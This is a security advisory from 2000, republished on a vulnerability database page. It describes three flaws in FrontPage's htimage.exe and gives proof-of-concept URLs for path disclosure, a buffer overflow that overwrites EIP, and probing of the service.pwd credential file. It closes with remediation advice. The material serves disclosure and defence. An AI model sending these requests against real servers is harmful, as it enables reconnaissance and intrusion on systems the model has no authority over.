Vulners
Lucene search
ADV-150400.txt
`-------[ Legion2000 - Russian Security Team (ADV-150400#1) ]-------
www.legion2000.cc
---- INFORMATION ----
Program Name : CERN Image Map Dispatcher
Discovered By : Narrow ([email protected])
---------------------
Problem Description
~~~~~~~~~~~~~~~~~~
CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I found three bugs
in "htimage.exe": 1) Gives us the full path to the root directory 2) Simple buffer overflow 3) Allow
us to access files.
Problem #1
~~~~~~~~~
Like I said, the first bug gives us the full path to the root directory. I tested this vulnerability
against some servers, all where vulnerable!
Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706, 4.0.2.2717, 2.0.1.927, 3.0.2.926,
3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are vulnerable if we have premission
to execute "htimage.exe" + If "htimage.exe" exist).
To test this vulnerability we need "htimage.exe" in our "cgi-bin" directory (it's installed by default)
and premission to execute it. That's why only Windows is vulnerable, Unix based systems can't execute
"*.exe" files.
If we access "htimage.exe" using our favorite web browser like: http://server/cgi-bin/htimage.exe/linux?0,0
we get this error:
------------------------------------------------------------------------------------
Error
Error calling HTImage:
Picture config file not found, tried the following:
q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
/linux
------------------------------------------------------------------------------------
Now we know that the path to the root directory is "q:/hidden_directory_because_of_the_script_kiddies/webroot/".
Problem #2
~~~~~~~~~
Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0" and "FrontPage-PWS32".
Tested / Vulnerable OS: Windows'95/98
"htimage.exe" buffer overflows if we access it like: http://server/cgi-bin/htimage.exe/<741 A's>?0,0.
------------------------------------------------------------------------------------
HTIMAGE caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=0000
Bytes at CS:EIP:
Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
------------------------------------------------------------------------------------
<Server still running> + <500 Server Error>
First remote FrontPage exploit?
Problem #3
~~~~~~~~~
It's not a serious bug. Using "htimage.exe" we can access files on server, but
we can't read them. Accessing "htimage.exe" like: http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
outputs:
------------------------------------------------------------------------------------
Error
Error calling HTImage:
HTImage.c: Syntax error at line 1 Bad field name, expecting 'default', 'rectangle', 'circle' or
'polygon' (got an alphanumeric string)
------------------------------------------------------------------------------------
NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden
Solution
~~~~~~~
1) Remove "htimage.exe".
2) Do not use FrontPage, simple enough :)
Comments
~~~~~~~
Sorry for my bad english, not my mother/father language ;)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Apr 2000 00:00Current